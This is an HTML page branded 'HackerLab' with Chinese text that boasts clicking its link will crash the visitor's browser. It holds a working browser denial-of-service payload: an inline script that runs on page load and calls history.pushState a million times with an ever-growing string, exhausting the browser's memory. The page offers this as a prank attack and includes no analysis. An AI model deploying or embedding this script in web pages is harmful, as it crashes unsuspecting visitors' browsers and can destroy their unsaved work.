<!DOCTYPE html>
<html>
    <head>
        <title>崩溃吧，地球人</title>

        <style>
            html, body {
                height: 100%;
            }

            body {
                margin: 0;
                padding: 0;
                width: 100%;
                color: #444;
                display: table;
                font-weight: 100;
                -webkit-font-smoothing: antialiased;
                font-family: "Helvetica Neue", Helvetica, 'Microsoft YaHei', Arial, sans-serif;
            }

            .container {
                text-align: center;
                display: table-cell;
                vertical-align: middle;
            }

            .content {
                text-align: center;
                display: inline-block;
            }

            .title {
                font-size: 96px;
            }

            .subtitle {
                font-size: 36px;
            }

            a {
                text-decoration: none;
                color:#666;
            }
        </style>
    </head>
    <body>
        <div class="container">
            <div class="content">
                <h1 class="title">HackerLab</h1>
                <div class="subtitle">-信息安全实验室 </div>
                <p><a href="" target="_blank">点击这个链接你的浏览器就会崩溃哈哈</a></p>
            </div>
        </div>
<script>
var total="";
for (var i=0;i<1000000;i++)
{
    total= total+i.toString();
    history.pushState(0,0,total);
}
</script>
    </body>
</html>
